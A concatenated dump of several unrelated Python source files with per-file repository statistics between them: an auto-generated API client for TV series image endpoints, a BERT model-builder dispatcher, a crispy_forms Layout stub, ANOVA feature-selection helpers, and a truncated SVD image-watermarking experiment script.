raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method series_id_images_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `series_id_images_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
if 'accept_language' in params:
header_params['Accept-Language'] = params['accept_language'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['jwtToken'] # noqa: E501
return self.api_client.call_api(
'/series/{id}/images', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SeriesImagesCounts', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def series_id_images_query_get(self, id, **kwargs): # noqa: E501
"""series_id_images_query_get # noqa: E501
Query images for the given series ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.series_id_images_query_get(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: ID of the series (required)
:param str key_type: Type of image you're querying for (fanart, poster, etc. See ../images/query/params for more details).
:param str resolution: Resolution to filter by (1280x1024, for example)
:param str sub_key: Subkey for the above query keys. See /series/{id}/images/query/params for more information
:param str accept_language: Records are returned with the some fields in the desired language, if it exists. If there is no translation for the given language, then the record is still returned but with empty values for the translated fields.
:return: SeriesImageQueryResults
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.series_id_images_query_get_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.series_id_images_query_get_with_http_info(id, **kwargs) # noqa: E501
return data
def series_id_images_query_get_with_http_info(self, id, **kwargs): # noqa: E501
"""series_id_images_query_get # noqa: E501
Query images for the given series ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.series_id_images_query_get_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: ID of the series (required)
:param str key_type: Type of image you're querying for (fanart, poster, etc. See ../images/query/params for more details).
:param str resolution: Resolution to filter by (1280x1024, for example)
:param str sub_key: Subkey for the above query keys. See /series/{id}/images/query/params for more information
:param str accept_language: Records are returned with the some fields in the desired language, if it exists. If there is no translation for the given language, then the record is still returned but with empty values for the translated fields.
:return: SeriesImageQueryResults
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'key_type', 'resolution', 'sub_key', 'accept_language'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method series_id_images_query_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `series_id_images_query_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
if 'key_type' in params:
query_params.append(('keyType', params['key_type'])) # noqa: E501
if 'resolution' in params:
query_params.append(('resolution', params['resolution'])) # noqa: E501
if 'sub_key' in params:
query_params.append(('subKey', params['sub_key'])) # noqa: E501
header_params = {}
if 'accept_language' in params:
header_params['Accept-Language'] = params['accept_language'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['jwtToken'] # noqa: E501
return self.api_client.call_api(
'/series/{id}/images/query', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SeriesImageQueryResults', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def series_id_images_query_params_get(self, id, **kwargs): # noqa: E501
"""series_id_images_query_params_get # noqa: E501
Returns the allowed query keys for the `/series/{id}/images/query` route. Contains a parameter record for each unique `keyType`, listing values that will return results. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.series_id_images_query_params_get(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: ID of the series (required)
:param str accept_language: Records are returned with the some fields in the desired language, if it exists. If there is no translation for the given language, then the record is still returned but with empty values for the translated fields.
:return: SeriesImagesQueryParams
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.series_id_images_query_params_get_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.series_id_images_query_params_get_with_http_info(id, **kwargs) # noqa: E501
return data
def series_id_images_query_params_get_with_http_info(self, id, **kwargs): # noqa: E501
"""series_id_images_query_params_get # noqa: E501
Returns the allowed query keys for the `/series/{id}/images/query` route. Contains a parameter record for each unique `keyType`, listing values that will return results. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.series_id_images_query_params_get_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: ID of the series (required)
:param str accept_language: Records are returned with the some fields in the desired language, if it exists. If there is no translation for the given language, then the record is still returned but with empty values for the translated fields.
:return: SeriesImagesQueryParams
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'accept_language'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method series_id_images_query_params_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `series_id_images_query_params_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
if 'accept_language' in params:
header_params['Accept-Language'] = params['accept_language'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['jwtToken'] # noqa: E501
return self.api_client.call_api(
'/series/{id}/images/query/params', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SeriesImagesQueryParams', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 45.087988
| 2,040
| 0.628508
| 7,310
| 58,930
| 4.844049
| 0.046238
| 0.048348
| 0.018978
| 0.0244
| 0.928325
| 0.922084
| 0.917848
| 0.913499
| 0.91076
| 0.908755
| 0
| 0.016257
| 0.283964
| 58,930
| 1,306
| 2,041
| 45.122511
| 0.822922
| 0.408502
| 0
| 0.797143
| 0
| 0
| 0.191432
| 0.049436
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035714
| false
| 0
| 0.005714
| 0
| 0.094286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
609baf493b97a0be785c4717bc1e541aa3bf2b97
| 5,758
|
py
|
Python
|
t2t_bert/distributed_single_sentence_classification/model_fn_interface.py
|
yyht/bert
|
480c909e0835a455606e829310ff949c9dd23549
|
[
"Apache-2.0"
] | 34
|
2018-12-19T01:00:57.000Z
|
2021-03-26T09:36:37.000Z
|
t2t_bert/distributed_single_sentence_classification/model_fn_interface.py
|
yyht/bert
|
480c909e0835a455606e829310ff949c9dd23549
|
[
"Apache-2.0"
] | 11
|
2018-12-25T03:37:59.000Z
|
2021-08-25T14:43:58.000Z
|
t2t_bert/distributed_single_sentence_classification/model_fn_interface.py
|
yyht/bert
|
480c909e0835a455606e829310ff949c9dd23549
|
[
"Apache-2.0"
] | 9
|
2018-12-27T08:00:44.000Z
|
2020-06-08T03:05:14.000Z
|
try:
from .model_fn import model_fn_builder
from .model_distillation_fn import model_fn_builder as model_distillation_builder_fn
from distributed_pair_sentence_classification.bert_model_fn import model_fn_builder as bert_nli_builder_fn
from distributed_pair_sentence_classification.interaction_model_fn import model_fn_builder as interaction_builder_fn
from distributed_pair_sentence_classification.interaction_distillation_model_fn import model_fn_builder as interaction_distillation_builder_fn
from .embed_model_fn import model_fn_builder as embed_model_fn_builder
from .model_feature_distillation_fn import model_fn_builder as feature_distillation_fn_builder
from .model_mdd_distillation import model_fn_builder as mdd_distillation_fn_builder
from .model_relation_distillation import model_fn_builder as rkd_distillation_fn_builder
from distributed_pair_sentence_classification.interaction_rkd_distillation_model_fn import model_fn_builder as interaction_rkd_distillation
# from pretrain_finetuning.classifier_fn_estimator import classifier_model_fn_builder as bert_pretrain_finetuning
from pretrain_finetuning.classifier_fn_tpu_estimator import classifier_model_fn_builder as bert_pretrain_finetuning
from .model_distillation_adv_adaptation import model_fn_builder as model_distillation_adv_adaptation_build_fn
from distributed_gpt.model_fn import model_fn_builder as gpt_lm_builder_fn
from chid_nlpcc2019.model_fn import model_fn_builder as chid_model_fn_builder
from chid_nlpcc2019.model_fn_crf import model_fn_builder as chid_crf_model_fn_builder
from pretrain_finetuning.classifier_fn_tpu_bert_seq_estimator import classifier_model_fn_builder as bert_seq_model_fn_builder
from pretrain_finetuning.classifier_fn_tpu_gatedcnn_estimator import classifier_model_fn_builder as gatedcnn_model_fn_builder
except:
from model_fn import model_fn_builder
from model_distillation_fn import model_fn_builder as model_distillation_builder_fn
from distributed_pair_sentence_classification.bert_model_fn import model_fn_builder as bert_nli_builder_fn
from distributed_pair_sentence_classification.interaction_model_fn import model_fn_builder as interaction_builder_fn
from distributed_pair_sentence_classification.interaction_distillation_model_fn import model_fn_builder as interaction_distillation_builder_fn
from embed_model_fn import model_fn_builder as embed_model_fn_builder
from model_feature_distillation_fn import model_fn_builder as feature_distillation_fn_builder
from model_mdd_distillation import model_fn_builder as mdd_distillation_fn_builder
from model_relation_distillation import model_fn_builder as rkd_distillation_fn_builder
from distributed_pair_sentence_classification.interaction_rkd_distillation_model_fn import model_fn_builder as interaction_rkd_distillation
# from pretrain_finetuning.classifier_fn_estimator import classifier_model_fn_builder as bert_pretrain_finetuning
from pretrain_finetuning.classifier_fn_tpu_estimator import classifier_model_fn_builder as bert_pretrain_finetuning
from model_distillation_adv_adaptation import model_fn_builder as model_distillation_adv_adaptation_build_fn
from distributed_gpt.model_fn import model_fn_builder as gpt_lm_builder_fn
from chid_nlpcc2019.model_fn import model_fn_builder as chid_model_fn_builder
from chid_nlpcc2019.model_fn_crf import model_fn_builder as chid_crf_model_fn_builder
from pretrain_finetuning.classifier_fn_tpu_bert_seq_estimator import classifier_model_fn_builder as bert_seq_model_fn_builder
from pretrain_finetuning.classifier_fn_tpu_gatedcnn_estimator import classifier_model_fn_builder as gatedcnn_model_fn_builder
import tensorflow as tf
def model_fn_interface(FLAGS):
print("==apply {} {} model fn builder==".format(FLAGS.task_type, FLAGS.distillation))
if FLAGS.task_type in ["single_sentence_classification",
"single_sentence_multilabel_classification",
"single_sentence_multilabel_classification_bert",
"single_sentence_classification_bert"]:
if FLAGS.distillation == "distillation":
return model_distillation_builder_fn
elif FLAGS.distillation == "normal":
return model_fn_builder
elif FLAGS.distillation == "feature_distillation":
return feature_distillation_fn_builder
elif FLAGS.distillation == "mdd_distillation":
return mdd_distillation_fn_builder
elif FLAGS.distillation == "rkd_distillation":
return rkd_distillation_fn_builder
elif FLAGS.distillation == "adv_adaptation_distillation":
return model_distillation_adv_adaptation_build_fn
else:
return model_fn_builder
elif FLAGS.task_type in ["pair_sentence_classification"]:
if FLAGS.distillation == "normal":
return bert_nli_builder_fn
else:
return bert_nli_builder_fn
elif FLAGS.task_type in ["interaction_pair_sentence_classification"]:
if FLAGS.distillation == "normal":
return interaction_builder_fn
elif FLAGS.distillation == "distillation":
return interaction_distillation_builder_fn
elif FLAGS.distillation == "rkd_distillation":
return interaction_rkd_distillation
else:
return interaction_builder_fn
elif FLAGS.task_type in ["embed_sentence_classification"]:
return embed_model_fn_builder
elif FLAGS.task_type in ['bert_pretrain']:
return bert_pretrain_finetuning
elif FLAGS.task_type in ['gpt_pretrain']:
return gpt_lm_builder_fn
elif FLAGS.task_type in ['bert_chid']:
return chid_model_fn_builder
elif FLAGS.task_type in ['bert_chid_crf']:
return chid_crf_model_fn_builder
elif FLAGS.task_type in ['bert_seq_lm']:
tf.logging.info("****** bert seq lm ******* ")
return bert_seq_model_fn_builder
elif FLAGS.task_type in ['gatedcnn_seq_lm']:
tf.logging.info("****** bert gatedcnn_seq_lm ******* ")
return gatedcnn_model_fn_builder
| 59.979167
| 143
| 0.869225
| 815
| 5,758
| 5.631902
| 0.068712
| 0.111329
| 0.164706
| 0.118519
| 0.875599
| 0.837255
| 0.747059
| 0.726144
| 0.686928
| 0.662745
| 0
| 0.00306
| 0.091872
| 5,758
| 95
| 144
| 60.610526
| 0.874737
| 0.038729
| 0
| 0.37931
| 0
| 0
| 0.100145
| 0.049892
| 0
| 0
| 0
| 0
| 0
| 1
| 0.011494
| false
| 0
| 0.402299
| 0
| 0.643678
| 0.011494
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
716c8530c3806d943baad3a778449fc4d9f2e319
| 108
|
py
|
Python
|
tbxforms/layout/base.py
|
jams2/tbxforms
|
d88aabb428a5e74d67fe877eb1e74bf9d9550c9f
|
[
"BSD-2-Clause"
] | 15
|
2020-04-07T10:27:33.000Z
|
2022-03-07T13:25:40.000Z
|
tbxforms/layout/base.py
|
jams2/tbxforms
|
d88aabb428a5e74d67fe877eb1e74bf9d9550c9f
|
[
"BSD-2-Clause"
] | 13
|
2022-02-21T10:24:59.000Z
|
2022-03-28T11:26:58.000Z
|
tbxforms/layout/base.py
|
jams2/tbxforms
|
d88aabb428a5e74d67fe877eb1e74bf9d9550c9f
|
[
"BSD-2-Clause"
] | 5
|
2021-02-24T13:57:17.000Z
|
2021-09-27T10:11:58.000Z
|
from crispy_forms import layout as crispy_forms_layout
class Layout(crispy_forms_layout.Layout):
pass
| 18
| 54
| 0.824074
| 16
| 108
| 5.25
| 0.5
| 0.392857
| 0.404762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.138889
| 108
| 5
| 55
| 21.6
| 0.903226
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
7173fe05e1485e36396bb47b2c985b2980cffa5e
| 4,295
|
py
|
Python
|
auto_machine_learning/feature_engineering/anova.py
|
mihir2510/SuperML
|
e2c236a3a1e64c4bc480ba853e61b14349bd4b6f
|
[
"MIT"
] | 1
|
2021-06-12T15:17:34.000Z
|
2021-06-12T15:17:34.000Z
|
auto_machine_learning/feature_engineering/anova.py
|
mihir2510/SuperML
|
e2c236a3a1e64c4bc480ba853e61b14349bd4b6f
|
[
"MIT"
] | 1
|
2022-02-20T06:45:12.000Z
|
2022-02-20T06:45:12.000Z
|
auto_machine_learning/feature_engineering/anova.py
|
mihir2510/SuperML
|
e2c236a3a1e64c4bc480ba853e61b14349bd4b6f
|
[
"MIT"
] | 1
|
2021-05-31T15:44:25.000Z
|
2021-05-31T15:44:25.000Z
|
from auto_machine_learning.utils import *
from sklearn.feature_selection import f_classif, SelectKBest
from sklearn.model_selection import train_test_split
from sklearn import metrics
from math import ceil, sqrt, log2
#---------------------------------------------------------------------------------------------------------------------#
def anova_regressor(dataset,label,anova_estimator='RandomForestRegressor'):
'''
Anova (analysis of variance) is used to select features
Parameters:
dataset(dataframe) : data to be used for training model
label (string): target column of the dataframe
anova_estimator (model class reference)
Returns:
dataset(dataframe) : processed data to be used for training model
'''
anova_estimator=get_model(anova_estimator)
features = get_features(dataset, label)
n = len(features)
# List containing the different values to consider as K
numberOfFeatures = [ceil(log2(n)), ceil(sqrt(n)), n]
X,Y = dataset[features], dataset[label]
optimal_k = -1
max_score = float('-inf')
for k in numberOfFeatures:
try:
selector = SelectKBest(f_classif,k=k)
selector.fit(X,Y)
columns=selector.get_support(indices=True)
important_features = X.iloc[:,columns].columns
except Exception as e:
print(e)
raise Exception("Error in finding important features ")
X_reduced=dataset[important_features]
X_train,X_test,Y_train,Y_test = train_test_split(X_reduced,Y,test_size=0.3,random_state=1)
model=anova_estimator()
model.fit(X_train,Y_train)
score=model.score(X_test,Y_test)
if score>max_score:
max_score = score
optimal_k = k
# print('internal',k,score, max_score)
# print('internal',optimal_k)
selector = SelectKBest(f_classif,k=optimal_k)
selector.fit(X,Y)
column = selector.get_support(indices=True)
important_features = list(X.iloc[:,columns].columns)
# print(important_features)
important_features.append(label)
X = dataset[important_features]
return X
#---------------------------------------------------------------------------------------------------------------------#
def anova_classifier(dataset,label,anova_estimator='RandomForestClassifier'):
'''
Anova (analysis of variance) is used to select features
Parameters:
dataset(dataframe) : data to be used for training model
label (string): target column of the dataframe
anova_estimator (model class reference)
Returns:
dataset(dataframe) : processed data to be used for training model
'''
anova_estimator = get_model(anova_estimator)
features = get_features(dataset, label)
n = len(features)
# List containing the different values to consider as K
numberOfFeatures = [ceil(log2(n)), ceil(sqrt(n)), n]
X,Y = dataset[features], dataset[label]
optimal_k = -1
max_score = float('-inf')
for k in numberOfFeatures:
try:
selector = SelectKBest(f_classif,k=k)
selector.fit(X,Y)
columns=selector.get_support(indices=True)
important_features = X.iloc[:,columns].columns
except Exception as e:
raise type(e)("Error in finding important features")
X_reduced=dataset[important_features]
X_train,X_test,Y_train,Y_test = train_test_split(X_reduced,Y,test_size=0.3,random_state=1)
model=anova_estimator()
model.fit(X_train,Y_train)
Y_pred = model.predict(X_test)
score=metrics.accuracy_score(Y_test,Y_pred)
if score>max_score:
max_score = score
optimal_k = k
selector = SelectKBest(f_classif,k=optimal_k)
selector.fit(X,Y)
column = selector.get_support(indices=True)
important_features = list(X.iloc[:,columns].columns)
important_features.append(label)
X = dataset[important_features]
return X
#---------------------------------------------------------------------------------------------------------------------#
| 36.398305
| 119
| 0.595576
| 491
| 4,295
| 5.032587
| 0.207739
| 0.089437
| 0.046135
| 0.019425
| 0.80089
| 0.80089
| 0.80089
| 0.80089
| 0.80089
| 0.80089
| 0
| 0.003375
| 0.241211
| 4,295
| 117
| 120
| 36.709402
| 0.754833
| 0.299418
| 0
| 0.811594
| 0
| 0
| 0.041781
| 0.014726
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028986
| false
| 0
| 0.246377
| 0
| 0.304348
| 0.014493
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
71c1dfa9068d28774bc922fc0a1c22c7b6df071e
| 30,376
|
py
|
Python
|
katie/SVD_Code_NEW/Watermarking_New/watermark_experiments.py
|
S-I-SVD/Randomized-SVD
|
82108238a53c70938af87417f98aadc7f74b2a87
|
[
"MIT"
] | 1
|
2021-12-09T13:34:44.000Z
|
2021-12-09T13:34:44.000Z
|
katie/SVD_Code_NEW/Watermarking_New/watermark_experiments.py
|
S-I-SVD/Randomized-SVD
|
82108238a53c70938af87417f98aadc7f74b2a87
|
[
"MIT"
] | null | null | null |
katie/SVD_Code_NEW/Watermarking_New/watermark_experiments.py
|
S-I-SVD/Randomized-SVD
|
82108238a53c70938af87417f98aadc7f74b2a87
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt
import matplotlib
import numpy as np
import os
import imageio
from timeit import timeit
from mpl_toolkits import mplot3d
from PIL import Image
#import png
import svd_tools_copy as svdt
import image_tools_copy as it
#import ../../../david/watermark as watermarktools
#sunset = it.load_image('../res/sunset.png')
#rainbow = it.load_image('../res/rainbow.png')
#view = it.load_image('../res/view.png')
view = it.load_image('../res/view.jpg')
tree = it.load_image('../res/tree.jpg')
plt.rcParams['font.size'] = '18'
def sv_plot_save(img, fname): #plotting the singular values, can only be used on a stacked matrix
#formatting
img = img.astype(np.float64)
#stacking color channels
img_rows, img_columns = img.shape[:2]
img_stacked = img.reshape(img_rows, -1)
u, s, v = np.linalg.svd(img_stacked, full_matrices=False)
plt.plot(s)
plt.savefig(fname)
#EXTRACTION ERROR = NORM(ORIGINAL WATERMARK - EXTRACTED WATERMARK)
#1. COMPUTE EMBEDDING AND EXTRACTION
#2. COMPUTE NORM(ORIGINAL WATERMARK - EXTRACTED WATERMARK)/NORM(ORIGINAL WATERMARK)
def reversepad(watermark_extracted,original_watermark):
sizes = original_watermark.shape
watermark_extracted = watermark_extracted[:sizes[0],:sizes[1]]
return watermark_extracted
def reversepad3d(watermark_extracted,original_watermark):
sizes = original_watermark.shape
watermark_extracted = watermark_extracted[:sizes[0],:sizes[1],:sizes[2]]
return watermark_extracted
def watermark_embed_liutan(img, watermark, scale, save):
#embeds watermark into image. if save == 'yes', then it will save to out/watermarking/watermarked_image/liutan
img_watermarked, watermarked_u, mat_s, watermarked_vh = it.embed_watermark(img, watermark, scale=scale)
img_watermarked = img_watermarked.astype(np.int32)
if save=='no':
return img_watermarked
elif save=='yes':
it.save_image(img_watermarked,'../out/watermarking/watermarked_image/liutan/watermarked_image_alpha_{}.png'.format(scale))
#Image.fromarray(img_watermarked,'RGB').save('../out/watermarking/watermarked_image/liutan/watermarked_image_alpha_{}.png'.format(scale), 'PNG')
def watermark_extract_liutan(img, watermark, scale, save):
#embeds watermark into image and then extracts the watermark. if save == 'yes', then it will save to out/res/watermark
img_watermarked, watermarked_u, mat_s, watermarked_vh = it.embed_watermark(img, watermark, scale=scale)
watermark_extracted = it.extract_watermark(img_watermarked, watermarked_u, mat_s, watermarked_vh,
scale=scale)
watermark_extracted_final = reversepad(watermark_extracted, watermark)
watermark_extracted_final = watermark_extracted_final.astype(np.int32)
if save=='no':
return watermark_extracted_final
elif save=='yes':
it.save_image(watermark_extracted_final,'../out/watermarking/extracted_watermark/liutan/extracted_watermark_alpha_{}.png'.format(scale))
def watermark_embed_jain(img, watermark, scale, save):
#embeds watermark into image. if save == 'yes', then it will save to out/watermarking/watermarked_image/jain
img_watermarked, watermark_vh = it.embed_watermark_jain(img, watermark, scale=scale)
img_watermarked = img_watermarked.astype(np.int32)
if save=='no':
return img_watermarked
elif save=='yes':
it.save_image(img_watermarked,'../out/watermarking/watermarked_image/jain/watermarked_image_alpha_{}.png'.format(scale))
def watermark_extract_jain(img, watermark, scale, save):
#embeds watermark into image. if save == 'yes', then it will save to out/watermarking/watermarked_image/jain
img_watermarked, watermark_vh = it.embed_watermark_jain(img, watermark, scale=scale)
watermark_extracted = it.extract_watermark_jain(img_watermarked, img, watermark_vh, scale)
watermark_extracted_final = reversepad(watermark_extracted, watermark)
watermark_extracted_final = watermark_extracted_final.astype(np.int32)
if save=='no':
return watermark_extracted_final
elif save=='yes':
it.save_image(watermark_extracted_final,'../out/watermarking/extracted_watermark/jain/extracted_watermark_alpha_{}.png'.format(scale))
def watermark_embed_jain_mod(img, watermark, scale, save):
#embeds watermark into image. if save == 'yes', then it will save to out/watermarking/watermarked_image/jainmod
img_watermarked, watermark_vh = it.embed_watermark_jain_mod(img, watermark, scale=scale)
img_watermarked = img_watermarked.astype(np.int32)
if save=='no':
return img_watermarked
elif save=='yes':
it.save_image(img_watermarked,'../out/watermarking/watermarked_image/jainmod/watermarked_image_alpha_{}.png'.format(scale))
def watermark_extract_jain_mod(img, watermark, scale, save):
#embeds watermark into image. if save == 'yes', then it will save to out/watermarking/watermarked_image/jainmod
img_watermarked, watermark_vh = it.embed_watermark_jain_mod(img, watermark, scale=scale)
watermark_extracted = it.extract_watermark_jain_mod(img_watermarked, img, watermark_vh, scale)
watermark_extracted_final = reversepad(watermark_extracted, watermark)
watermark_extracted_final = watermark_extracted_final.astype(np.int32)
if save=='no':
return watermark_extracted_final
elif save=='yes':
it.save_image(watermark_extracted_final,'../out/watermarking/extracted_watermark/jainmod/extracted_watermark_alpha_{}.png'.format(scale))
def perceptibility_liutan(img, watermark, scale):
#watermarked image
img_watermarked, watermarked_u, mat_s, watermarked_vh = it.embed_watermark(img, watermark, scale=scale)
#stacking watermarked image
img_watermarked = img_watermarked.astype(np.int32)
img_watermarked_rows, img_watermarked_columns = img_watermarked.shape[:2]
img_watermarked_stacked = img_watermarked.reshape(img_watermarked_rows, -1)
#stacking image
img = img.astype(np.int32)
img_rows, img_columns = img.shape[:2]
img_stacked = img.reshape(img_rows, -1)
#norm difference
error = (np.linalg.norm(img_watermarked_stacked-img_stacked))/(np.linalg.norm(img_stacked))
return error
def perceptibility_jain(img, watermark, scale):
#watermarked image
img_watermarked, watermark_vh = it.embed_watermark_jain(img, watermark, scale=scale)
#stacking watermarked image
img_watermarked = img_watermarked.astype(np.int32)
img_watermarked_rows, img_watermarked_columns = img_watermarked.shape[:2]
img_watermarked_stacked = img_watermarked.reshape(img_watermarked_rows, -1)
#stacking image
img = img.astype(np.int32)
img_rows, img_columns = img.shape[:2]
img_stacked = img.reshape(img_rows, -1)
#norm difference
error = (np.linalg.norm(img_watermarked_stacked-img_stacked))/(np.linalg.norm(img_stacked))
return error
def perceptibility_jain_mod(img, watermark, scale):
#watermarked image
img_watermarked, watermark_vh = it.embed_watermark_jain_mod(img, watermark, scale=scale)
#stacking watermarked image
img_watermarked = img_watermarked.astype(np.int32)
img_watermarked_rows, img_watermarked_columns = img_watermarked.shape[:2]
img_watermarked_stacked = img_watermarked.reshape(img_watermarked_rows, -1)
#stacking image
img = img.astype(np.int32)
img_rows, img_columns = img.shape[:2]
img_stacked = img.reshape(img_rows, -1)
#norm difference
error = (np.linalg.norm(img_watermarked_stacked-img_stacked))/(np.linalg.norm(img_stacked))
return error
def watermarkedplot(img,watermark,plottype):
scales = np.arange(0.05,2.05,0.05)
differences = []
#liu tan
if plottype == 1:
for scale in scales:
print(scale)
difference = perceptibility_liutan(img, watermark, scale)
differences.append(difference)
#jain
if plottype == 2:
for scale in scales:
print(scale)
difference = perceptibility_jain(img, watermark, scale)
differences.append(difference)
#jain mod
if plottype == 3:
for scale in scales:
print(scale)
difference = perceptibility_jain_mod(img, watermark, scale)
differences.append(difference)
drawgraph_difference(scales,differences,plottype)
def drawgraph_difference(x,y,plottype):
plt.plot(x,y,marker='o')
plt.xlabel('Alpha')
plt.ylabel('Error')
#plt.show()
#liutan
if plottype == 1:
plt.savefig('../out/watermarking/plots/perceptibility/liutan/perceptibility_liutan.png')
if plottype == 2:
plt.savefig('../out/watermarking/plots/perceptibility/jain/perceptibility_jain.png')
if plottype == 3:
plt.savefig('../out/watermarking/plots/perceptibility/jainmod/perceptibility_jain_mod.png')
plt.show()
#lowrank extraction error
def lowrank_image_liutan(img, watermark, scale, rank, save):
#watermarked image
img_watermarked, watermarked_u, mat_s, watermarked_vh = it.embed_watermark(img, watermark, scale=scale)
img_watermarked = img_watermarked.astype(np.int32)
#applying low rank compression to watermarked image
img_watermarked_approx = it.lowrankapprox(img_watermarked,rank)
#extracting watermark using original extraction key and compressed watermarked image
watermark_extracted = it.extract_watermark(img_watermarked_approx, watermarked_u, mat_s, watermarked_vh,
scale=scale)
watermark_extracted = reversepad(watermark_extracted, watermark)
watermark_extracted = watermark_extracted.astype(np.int32)
if save=='no':
return watermark_extracted
elif save=='yes':
it.save_image(watermark_extracted,'../out/watermarking/robustness/lowrankextraction/liutan/extraction_rank_{}_alpha_{}.png'.format(rank,scale))
def lowrank_watermarked_image_liutan(img, watermark, scale, rank, save):
#watermarked image
img_watermarked, watermarked_u, mat_s, watermarked_vh = it.embed_watermark(img, watermark, scale=scale)
img_watermarked = img_watermarked.astype(np.int32)
#applying low rank compression to watermarked image
img_watermarked_approx = it.lowrankapprox(img_watermarked,rank)
img_watermarked_approx = img_watermarked_approx.astype(np.int32)
